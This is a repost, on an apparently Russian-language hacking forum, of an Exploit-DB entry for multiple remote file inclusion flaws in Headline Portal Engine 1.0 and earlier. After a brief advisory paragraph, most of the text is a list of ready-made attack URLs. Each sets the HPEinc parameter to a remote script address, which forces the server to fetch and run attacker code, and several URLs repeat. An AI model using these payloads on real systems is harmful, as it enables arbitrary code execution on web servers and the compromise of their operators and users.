Exploit Headline Portal Engine 0.x/1.0 - 'HPEInc' Multiple Remote File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28426
Проверка EDB
  1. Пройдено
Автор
THE MASTER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-08-21
Код:
source: https://www.securityfocus.com/bid/19663/info

Multiple remote file-include vulnerabilities affect HPE because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. 

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. 

These issues affect versions 1.0, 0.7.0, 0.6.5, and 0.6.1; other versions may also be vulnerable.

http://www.example.com/HPE/lang/de.php?HPEinc=http://cmd.gif?
http://www.example.com/HPE/lang/fr.php?HPEinc=http://cmd.gif?
http://www.example.com/HPE/clickerr.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/loadcatnews.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/motd.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/mod.newslog.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/thememaker.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/page.newnews.show.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/page.randnews.show.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/page.teaser.show.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
http://www.example.com/HPE/thememaker.php3?HPEinc=http://cmd.gif?
 
Источник
www.exploit-db.com

Похожие темы